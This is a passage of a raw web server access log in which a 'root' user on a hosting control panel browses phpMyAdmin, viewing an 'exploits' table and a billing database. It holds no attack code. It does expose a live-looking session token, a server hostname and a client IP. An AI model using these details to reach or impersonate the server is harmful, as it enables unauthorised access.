Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:25:34 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/s_rights.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/phpmyadmin.css.php?token=8ca1ba8833931bc463e18a0da900681e&js_frame=right&nocache=3657783124" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:25:34 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/s_db.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/phpmyadmin.css.php?token=8ca1ba8833931bc463e18a0da900681e&js_frame=right&nocache=3657783124" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:25:34 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/b_export.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/phpmyadmin.css.php?token=8ca1ba8833931bc463e18a0da900681e&js_frame=right&nocache=3657783124" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:25:34 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/b_import.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/phpmyadmin.css.php?token=8ca1ba8833931bc463e18a0da900681e&js_frame=right&nocache=3657783124" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:25:34 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/s_lang.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/phpmyadmin.css.php?token=8ca1ba8833931bc463e18a0da900681e&js_frame=right&nocache=3657783124" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:25:34 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/s_theme.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/phpmyadmin.css.php?token=8ca1ba8833931bc463e18a0da900681e&js_frame=right&nocache=3657783124" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:25:35 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/b_home.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/phpmyadmin.css.php?token=8ca1ba8833931bc463e18a0da900681e&js_frame=right&nocache=3657783124" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:25:35 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/window-new.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/main.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=8ca1ba8833931bc463e18a0da900681e" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:25:38 -0000] "GET /3rdparty/phpMyAdmin/index.php?db=defaultp_milworm&token=8ca1ba8833931bc463e18a0da900681e HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/navigation.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=8ca1ba8833931bc463e18a0da900681e" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:25:38 -0000] "GET /3rdparty/phpMyAdmin/navigation.php?db=defaultp_milworm&token=8ca1ba8833931bc463e18a0da900681e HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/index.php?db=defaultp_milworm&token=8ca1ba8833931bc463e18a0da900681e" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:25:39 -0000] "GET /3rdparty/phpMyAdmin/db_structure.php?db=defaultp_milworm&token=8ca1ba8833931bc463e18a0da900681e HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/index.php?db=defaultp_milworm&token=8ca1ba8833931bc463e18a0da900681e" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:25:39 -0000] "GET /3rdparty/phpMyAdmin/print.css HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/db_structure.php?db=defaultp_milworm&token=8ca1ba8833931bc463e18a0da900681e" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:25:39 -0000] "GET /3rdparty/phpMyAdmin/phpmyadmin.css.php?token=8ca1ba8833931bc463e18a0da900681e&js_frame=left&nocache=3657783124 HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/navigation.php?db=defaultp_milworm&token=8ca1ba8833931bc463e18a0da900681e" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:25:40 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/b_sbrowse.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/navigation.php?db=defaultp_milworm&token=8ca1ba8833931bc463e18a0da900681e" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:25:40 -0000] "GET /3rdparty/phpMyAdmin/phpmyadmin.css.php?token=8ca1ba8833931bc463e18a0da900681e&js_frame=right&nocache=3657783124 HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/db_structure.php?db=defaultp_milworm&token=8ca1ba8833931bc463e18a0da900681e" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:25:41 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/item_ltr.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/db_structure.php?db=defaultp_milworm&token=8ca1ba8833931bc463e18a0da900681e" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:25:41 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/b_tipp.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/db_structure.php?db=defaultp_milworm&token=8ca1ba8833931bc463e18a0da900681e" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:25:43 -0000] "GET /3rdparty/phpMyAdmin/tbl_structure.php?db=defaultp_milworm&token=8ca1ba8833931bc463e18a0da900681e&table=exploits HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/navigation.php?db=defaultp_milworm&token=8ca1ba8833931bc463e18a0da900681e" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:25:46 -0000] "GET /3rdparty/phpMyAdmin/phpmyadmin.css.php?token=8ca1ba8833931bc463e18a0da900681e&js_frame=right&nocache=3657783124 HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/tbl_structure.php?db=defaultp_milworm&token=8ca1ba8833931bc463e18a0da900681e&table=exploits" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:25:48 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/b_browse.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/tbl_structure.php?db=defaultp_milworm&token=8ca1ba8833931bc463e18a0da900681e&table=exploits" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:25:48 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/s_tbl.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/tbl_structure.php?db=defaultp_milworm&token=8ca1ba8833931bc463e18a0da900681e&table=exploits" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:25:48 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/b_props.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/tbl_structure.php?db=defaultp_milworm&token=8ca1ba8833931bc463e18a0da900681e&table=exploits" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:25:48 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/b_search.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/tbl_structure.php?db=defaultp_milworm&token=8ca1ba8833931bc463e18a0da900681e&table=exploits" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:25:48 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/b_tblexport.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/tbl_structure.php?db=defaultp_milworm&token=8ca1ba8833931bc463e18a0da900681e&table=exploits" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:25:48 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/b_insrow.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/tbl_structure.php?db=defaultp_milworm&token=8ca1ba8833931bc463e18a0da900681e&table=exploits" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:25:48 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/b_tblimport.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/tbl_structure.php?db=defaultp_milworm&token=8ca1ba8833931bc463e18a0da900681e&table=exploits" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:25:48 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/b_sql.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/tbl_structure.php?db=defaultp_milworm&token=8ca1ba8833931bc463e18a0da900681e&table=exploits" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:25:48 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/b_tblops.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/tbl_structure.php?db=defaultp_milworm&token=8ca1ba8833931bc463e18a0da900681e&table=exploits" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:25:50 -0000] "GET /3rdparty/phpMyAdmin/sql.php?db=defaultp_milworm&table=exploits&token=8ca1ba8833931bc463e18a0da900681e&goto=tbl_structure.php&back=tbl_structure.php&pos=0 HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/tbl_structure.php?db=defaultp_milworm&token=8ca1ba8833931bc463e18a0da900681e&table=exploits" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:25:51 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:25:53 -0000] "GET /3rdparty/phpMyAdmin/phpmyadmin.css.php?token=8ca1ba8833931bc463e18a0da900681e&js_frame=right&nocache=3657783124 HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/sql.php?db=defaultp_milworm&table=exploits&token=8ca1ba8833931bc463e18a0da900681e&goto=tbl_structure.php&back=tbl_structure.php&pos=0" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:25:55 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/b_search.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/sql.php?db=defaultp_milworm&table=exploits&token=8ca1ba8833931bc463e18a0da900681e&goto=tbl_structure.php&back=tbl_structure.php&pos=0" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:25:55 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/b_tblops.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/sql.php?db=defaultp_milworm&table=exploits&token=8ca1ba8833931bc463e18a0da900681e&goto=tbl_structure.php&back=tbl_structure.php&pos=0" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:25:55 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/b_insrow.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/sql.php?db=defaultp_milworm&table=exploits&token=8ca1ba8833931bc463e18a0da900681e&goto=tbl_structure.php&back=tbl_structure.php&pos=0" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:25:55 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/b_tblexport.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/sql.php?db=defaultp_milworm&table=exploits&token=8ca1ba8833931bc463e18a0da900681e&goto=tbl_structure.php&back=tbl_structure.php&pos=0" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:25:55 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/b_tblimport.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/sql.php?db=defaultp_milworm&table=exploits&token=8ca1ba8833931bc463e18a0da900681e&goto=tbl_structure.php&back=tbl_structure.php&pos=0" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:25:55 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/b_sql.png? HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/sql.php?db=defaultp_milworm&table=exploits&token=8ca1ba8833931bc463e18a0da900681e&goto=tbl_structure.php&back=tbl_structure.php&pos=0" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:25:55 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/b_empty.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/sql.php?db=defaultp_milworm&table=exploits&token=8ca1ba8833931bc463e18a0da900681e&goto=tbl_structure.php&back=tbl_structure.php&pos=0" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:25:55 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/b_deltbl.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/sql.php?db=defaultp_milworm&table=exploits&token=8ca1ba8833931bc463e18a0da900681e&goto=tbl_structure.php&back=tbl_structure.php&pos=0" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:25:55 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/s_fulltext.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/sql.php?db=defaultp_milworm&table=exploits&token=8ca1ba8833931bc463e18a0da900681e&goto=tbl_structure.php&back=tbl_structure.php&pos=0" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:25:55 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/b_edit.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/sql.php?db=defaultp_milworm&table=exploits&token=8ca1ba8833931bc463e18a0da900681e&goto=tbl_structure.php&back=tbl_structure.php&pos=0" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:25:55 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/b_drop.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/sql.php?db=defaultp_milworm&table=exploits&token=8ca1ba8833931bc463e18a0da900681e&goto=tbl_structure.php&back=tbl_structure.php&pos=0" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:25:55 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/arrow_ltr.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/sql.php?db=defaultp_milworm&table=exploits&token=8ca1ba8833931bc463e18a0da900681e&goto=tbl_structure.php&back=tbl_structure.php&pos=0" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:25:56 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/b_print.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/sql.php?db=defaultp_milworm&table=exploits&token=8ca1ba8833931bc463e18a0da900681e&goto=tbl_structure.php&back=tbl_structure.php&pos=0" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:25:56 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/b_views.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/sql.php?db=defaultp_milworm&table=exploits&token=8ca1ba8833931bc463e18a0da900681e&goto=tbl_structure.php&back=tbl_structure.php&pos=0" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:25:56 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/s_notice.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/phpmyadmin.css.php?token=8ca1ba8833931bc463e18a0da900681e&js_frame=right&nocache=3657783124" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:25:56 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/window-new.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/sql.php?db=defaultp_milworm&table=exploits&token=8ca1ba8833931bc463e18a0da900681e&goto=tbl_structure.php&back=tbl_structure.php&pos=0" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:26:08 -0000] "GET /3rdparty/phpMyAdmin/main.php?token=8ca1ba8833931bc463e18a0da900681e HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/navigation.php?db=defaultp_milworm&token=8ca1ba8833931bc463e18a0da900681e" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:26:10 -0000] "GET /3rdparty/phpMyAdmin/phpmyadmin.css.php?token=8ca1ba8833931bc463e18a0da900681e&js_frame=right&nocache=3657783124 HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/main.php?token=8ca1ba8833931bc463e18a0da900681e" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:26:11 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/b_engine.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/phpmyadmin.css.php?token=8ca1ba8833931bc463e18a0da900681e&js_frame=right&nocache=3657783124" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:26:12 -0000] "GET /3rdparty/phpMyAdmin/navigation.php?server=1&token=8ca1ba8833931bc463e18a0da900681e&db=&table=&lang=en-utf-8&collation_connection=utf8_unicode_ci HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/index.php?db=defaultp_milworm&token=8ca1ba8833931bc463e18a0da900681e" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:26:13 -0000] "GET /xml-api/loadavg? HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:26:14 -0000] "GET /3rdparty/phpMyAdmin/phpmyadmin.css.php?token=8ca1ba8833931bc463e18a0da900681e&js_frame=left&nocache=3657783124 HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/navigation.php?server=1&token=8ca1ba8833931bc463e18a0da900681e&db=&table=&lang=en-utf-8&collation_connection=utf8_unicode_ci" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:26:27 -0000] "GET /3rdparty/phpMyAdmin/index.php?db=webhostl_billing&token=8ca1ba8833931bc463e18a0da900681e HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/navigation.php?server=1&token=8ca1ba8833931bc463e18a0da900681e&db=&table=&lang=en-utf-8&collation_connection=utf8_unicode_ci" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:26:29 -0000] "GET /3rdparty/phpMyAdmin/db_structure.php?db=webhostl_billing&token=8ca1ba8833931bc463e18a0da900681e HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/index.php?db=webhostl_billing&token=8ca1ba8833931bc463e18a0da900681e" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:26:29 -0000] "GET /3rdparty/phpMyAdmin/navigation.php?db=webhostl_billing&token=8ca1ba8833931bc463e18a0da900681e HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/index.php?db=webhostl_billing&token=8ca1ba8833931bc463e18a0da900681e" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:26:31 -0000] "GET /3rdparty/phpMyAdmin/phpmyadmin.css.php?token=8ca1ba8833931bc463e18a0da900681e&js_frame=left&nocache=3657783124 HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/navigation.php?db=webhostl_billing&token=8ca1ba8833931bc463e18a0da900681e" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:26:32 -0000] "GET /3rdparty/phpMyAdmin/phpmyadmin.css.php?token=8ca1ba8833931bc463e18a0da900681e&js_frame=right&nocache=3657783124 HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/db_structure.php?db=webhostl_billing&token=8ca1ba8833931bc463e18a0da900681e" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:26:34 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/b_sql.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/db_structure.php?db=webhostl_billing&token=8ca1ba8833931bc463e18a0da900681e" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:26:35 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:26:35 -0000] "GET 